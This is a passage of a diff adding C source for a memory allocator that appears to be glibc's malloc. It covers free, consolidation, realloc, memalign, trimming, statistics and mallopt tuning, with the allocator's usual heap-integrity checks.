+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
